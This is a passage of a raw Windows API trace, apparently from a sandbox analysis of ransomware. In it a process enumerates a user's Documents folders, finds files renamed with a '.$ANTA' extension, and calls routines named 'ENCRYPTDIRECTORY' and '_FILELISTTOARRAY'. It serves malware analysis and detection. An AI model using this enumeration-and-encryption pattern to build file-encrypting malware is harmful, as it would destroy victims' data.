wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.584] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.584] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9915ad9, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf9915ad9, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf9b9e2a6, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x55010, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Database1.accdb.$ANTA", cAlternateFileName="DATABA~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c36c8f, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf9c36c8f, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf9ca939c, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d44a40, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf9d44a40, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf9db43ba, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xd470, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="eJ Z0ZcCpMN.doc.$ANTA", cAlternateFileName="EJZ0ZC~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9e26b97, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf9e26b97, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf9e7306b, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="HD2UssJoRg1BYp.csv.$ANTA", cAlternateFileName="HD2USS~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9ee572f, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf9ee572f, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf9f57d4e, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x83d0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Lh2OVLi_4PS_2RxxQd.odp.$ANTA", cAlternateFileName="LH2OVL~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa0169a5, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa0169a5, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa062eb5, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x6f60, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="LI-IwwMLWnmp-I.pptx.$ANTA", cAlternateFileName="LI-IWW~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa0d5533, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa0d5533, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa147c3b, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x11fd0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="mnsjU.xlsx.$ANTA", cAlternateFileName="MNSJUX~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa2067dd, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa2067dd, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa278fe2, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x15fd0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="nDdxnatd.pptx.$ANTA", cAlternateFileName="NDDXNA~1.$AN")) returned 1 [0078.585] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa2eb63c, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa2eb63c, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa35dda6, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x74a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="NHgtkAPLnX.docx.$ANTA", cAlternateFileName="NHGTKA~1.$AN")) returned 1 [0078.586] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa48ef82, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa48ef82, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa501642, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x13950, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="NwJd3dflnaF4DbF3Yn.xlsx.$ANTA", cAlternateFileName="NWJD3D~1.$AN")) returned 1 [0078.586] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5e64d6, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa5e64d6, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa681a47, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x10250, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="O8- 8r.odt.$ANTA", cAlternateFileName="O8-8RO~1.$AN")) returned 1 [0078.586] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa73d9ac, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa73d9ac, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa7b4067, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x13820, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="ooKroY8WpRTqCJ.xlsx.$ANTA", cAlternateFileName="OOKROY~1.$AN")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x5ee892ad, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa7fc5c1, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa7fc5c1, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa8bb167, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x13e30, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="oZbDkszpyQazC9.docx.$ANTA", cAlternateFileName="OZBDKS~1.$AN")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa92d8f2, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfa92d8f2, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfa9ec538, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="QjLwz6.pptx.$ANTA", cAlternateFileName="QJLWZ6~1.$AN")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa38995, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfaa38995, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfab43914, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xeb00, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="T- t3K 6dV0.docx.$ANTA", cAlternateFileName="T-T3K6~1.$AN")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfabb60c0, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfabb60c0, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfac025cb, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x1aa0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="WfOLKWjF.xlsx.$ANTA", cAlternateFileName="WFOLKW~1.$AN")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfac4e9f6, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfac4e9f6, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfacc13a9, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x12d20, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="z6U2MzO.xlsx.$ANTA", cAlternateFileName="Z6U2MZ~1.$AN")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaeb0ea8, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfaeb0ea8, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfaf5c8ea, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xf760, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="z_HKc3lg6.pptx.$ANTA", cAlternateFileName="Z_HKC3~1.$AN")) returned 1 [0078.587] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2420, ftCreationTime.dwHighDateTime=0x144eff0, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2420, ftLastWriteTime.dwLowDateTime=0x43e93c8, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="", cAlternateFileName="縷мńဓ+\x10")) returned 0 [0078.587] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0078.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|D2Y3tG|My Music|My Pictures|My Shapes|My Videos|Outlook Files", cchCount1=62, lpString2="", cchCount2=0) returned 3 [0078.587] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0078.588] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0078.588] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0078.588] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbbd340, ftCreationTime.dwHighDateTime=0x1d5e57e, ftLastAccessTime.dwLowDateTime=0xb7031e40, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0xb7031e40, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca4c0, cFileName=".", cAlternateFileName="")) returned 0x41ac600 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbbd340, ftCreationTime.dwHighDateTime=0x1d5e57e, ftLastAccessTime.dwLowDateTime=0xb7031e40, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0xb7031e40, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca4c0, cFileName="..", cAlternateFileName="")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ddc140, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x3766f560, ftLastAccessTime.dwHighDateTime=0x1d5efae, ftLastWriteTime.dwLowDateTime=0x3766f560, ftLastWriteTime.dwHighDateTime=0x1d5efae, nFileSizeHigh=0x0, nFileSizeLow=0x23b6, dwReserved0=0x0, dwReserved1=0x43ca4c0, cFileName="1ft lPPb9LICRxn6.doc", cAlternateFileName="1FTLPP~1.DOC")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff20cd0, ftCreationTime.dwHighDateTime=0x1d5ecb2, ftLastAccessTime.dwLowDateTime=0x47d95710, ftLastAccessTime.dwHighDateTime=0x1d5ede4, ftLastWriteTime.dwLowDateTime=0x47d95710, ftLastWriteTime.dwHighDateTime=0x1d5ede4, nFileSizeHigh=0x0, nFileSizeLow=0x2262, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="6O-EvMa xQmykruQi.xlsx", cAlternateFileName="6O-EVM~1.XLS")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bf4640, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa7a67830, ftLastAccessTime.dwHighDateTime=0x1d5eb55, ftLastWriteTime.dwLowDateTime=0xa7a67830, ftLastWriteTime.dwHighDateTime=0x1d5eb55, nFileSizeHigh=0x0, nFileSizeLow=0x740a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="7QJQVMK.csv", cAlternateFileName="")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8c5f600, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x29ad7e90, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0x29ad7e90, ftLastWriteTime.dwHighDateTime=0x1d5e445, nFileSizeHigh=0x0, nFileSizeLow=0x18b87, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="cYT5WT.odt", cAlternateFileName="")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ecd1c80, ftCreationTime.dwHighDateTime=0x1d5e495, ftLastAccessTime.dwLowDateTime=0xb9a0f690, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0xb9a0f690, ftLastWriteTime.dwHighDateTime=0x1d5e453, nFileSizeHigh=0x0, nFileSizeLow=0xba63, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="eY_Dc1TDsg.pdf", cAlternateFileName="EY_DC1~1.PDF")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe20f20, ftCreationTime.dwHighDateTime=0x1d5e0ea, ftLastAccessTime.dwLowDateTime=0x240c9dd0, ftLastAccessTime.dwHighDateTime=0x1d5e626, ftLastWriteTime.dwLowDateTime=0x240c9dd0, ftLastWriteTime.dwHighDateTime=0x1d5e626, nFileSizeHigh=0x0, nFileSizeLow=0xb11b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="g_XT5mjGuHk8Nmh4F.pptx", cAlternateFileName="G_XT5M~1.PPT")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4429be70, ftCreationTime.dwHighDateTime=0x1d5e0b0, ftLastAccessTime.dwLowDateTime=0x502b6580, ftLastAccessTime.dwHighDateTime=0x1d5e339, ftLastWriteTime.dwLowDateTime=0x502b6580, ftLastWriteTime.dwHighDateTime=0x1d5e339, nFileSizeHigh=0x0, nFileSizeLow=0xa840, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="hR3cojo6WftWpyW3h.odt", cAlternateFileName="HR3COJ~1.ODT")) returned 1 [0078.588] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a31040, ftCreationTime.dwHighDateTime=0x1d5e638, ftLastAccessTime.dwLowDateTime=0xf70ffc60, ftLastAccessTime.dwHighDateTime=0x1d5eebc, ftLastWriteTime.dwLowDateTime=0xf70ffc60, ftLastWriteTime.dwHighDateTime=0x1d5eebc, nFileSizeHigh=0x0, nFileSizeLow=0x12f5a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="IVMtcxmHJDptt31P9OCD.xls", cAlternateFileName="IVMTCX~1.XLS")) returned 1 [0078.590] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e570, ftCreationTime.dwHighDateTime=0x1d5e391, ftLastAccessTime.dwLowDateTime=0xb4e09380, ftLastAccessTime.dwHighDateTime=0x1d5edc3, ftLastWriteTime.dwLowDateTime=0xb4e09380, ftLastWriteTime.dwHighDateTime=0x1d5edc3, nFileSizeHigh=0x0, nFileSizeLow=0x13f79, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="IWVSvvMxlOfdD1.ods", cAlternateFileName="IWVSVV~1.ODS")) returned 1 [0078.590] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6536320, ftCreationTime.dwHighDateTime=0x1d5ee20, ftLastAccessTime.dwLowDateTime=0xc1280e0, ftLastAccessTime.dwHighDateTime=0x1d5e2a8, ftLastWriteTime.dwLowDateTime=0xc1280e0, ftLastWriteTime.dwHighDateTime=0x1d5e2a8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="kc_ drhegB", cAlternateFileName="KC_DRH~1")) returned 1 [0078.590] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a6b8c0, ftCreationTime.dwHighDateTime=0x1d5eade, ftLastAccessTime.dwLowDateTime=0x58f88120, ftLastAccessTime.dwHighDateTime=0x1d5e654, ftLastWriteTime.dwLowDateTime=0x58f88120, ftLastWriteTime.dwHighDateTime=0x1d5e654, nFileSizeHigh=0x0, nFileSizeLow=0xadcc, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="Ko5KMbWIjv.pdf", cAlternateFileName="KO5KMB~1.PDF")) returned 1 [0078.590] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c3c2c0, ftCreationTime.dwHighDateTime=0x1d5e967, ftLastAccessTime.dwLowDateTime=0xefd1a510, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0xefd1a510, ftLastWriteTime.dwHighDateTime=0x1d5efe9, nFileSizeHigh=0x0, nFileSizeLow=0x12013, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="sAJ5q4Jpz7.csv", cAlternateFileName="SAJ5Q4~1.CSV")) returned 1 [0078.590] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2370, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x12, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="豈мńဓ+\x10")) returned 0 [0078.590] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0078.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|1ft lPPb9LICRxn6.doc|6O-EvMa 